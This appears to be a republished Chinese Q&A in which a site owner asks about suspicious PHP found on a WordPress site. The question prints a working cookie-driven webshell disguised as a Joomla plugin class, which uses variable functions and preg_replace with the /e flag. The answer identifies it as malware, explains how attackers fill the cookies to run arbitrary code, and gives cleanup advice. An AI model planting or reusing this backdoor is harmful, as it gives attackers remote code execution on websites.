从cookie执行PHP代码

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了从cookie执行PHP代码，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1592字，纯文字阅读大概需要3分钟。

内容图文

我发现了这么有趣的代码：

class PluginJoomla {
    public function __construct() {
        $jq = @$_COOKIE['ContentJQ3'];
        if ($jq) {
            $option = $jq(@$_COOKIE['ContentJQ2']);
            $au=$jq(@$_COOKIE['ContentJQ1']);
            $option("/438/e",$au,438); die();
        }
        else
            phpinfo();die;
    }
}
$content = new PluginJoomla;

它是WordPress网站的一部分,因此请忽略类名.
如您所见,$jq变量是从某些Cookie文件获取其值的.后来,它似乎被视为一个函数：

$jq(@$_COOKIE['ContentJQ2']);

如您所见,这是使用Variable函数(https://php.net/manual/en/functions.variable-functions.php)的非常基本的PHP.

后来$jq变量函数返回$option变量的函数和$au变量的字符串：

$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438);

所以,我有一个问题,是否可以这样做,但是要从Cookie文件中执行PHP代码(不仅考虑exec()函数,还包括带有require()或使用ob_start()和ob_get_clean的此类文件) ())？

您还对代码本身有什么看法,它是某种病毒还是恶意软件？

解决方法:

它绝对是恶意的脚本.让我猜,您在/ wp-content / uploads / gravity_forms / …中找到了它？那是我在许多客户未更新其重力模板安装的站点上找到它的地方. (幸运的是,/ wp-content / uploads / *.php在我的服务器上被阻止.)

“ $option(” / 438 / e“,$au,438);”意味着由于/ e标志,当$option为preg_replace时执行$au.

通过$_COOKIE [‘ContentJQ3’] =“ base64_decode”,$_COOKIE [‘ContentJQ1’] = base64(“ preg_replace”)和$_COOKIE [‘ContentJQ2’] = base64(“ arbitrary_php_code();”),最终执行黑客喜欢的任何php代码.然后可以使用它从文件系统下载任何文件(PHP可以访问该文件；记住open_basedir),对数据库执行任何您喜欢的操作.

如果在文件系统上找到此文件,请检查访问日志以查看是否被黑客入侵.如果您不能证明自己不是,请考虑您的网站已遭到入侵.

内容总结

以上是互联网集市为您收集整理的从cookie执行PHP代码全部内容，希望文章能够帮你解决从cookie执行PHP代码所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端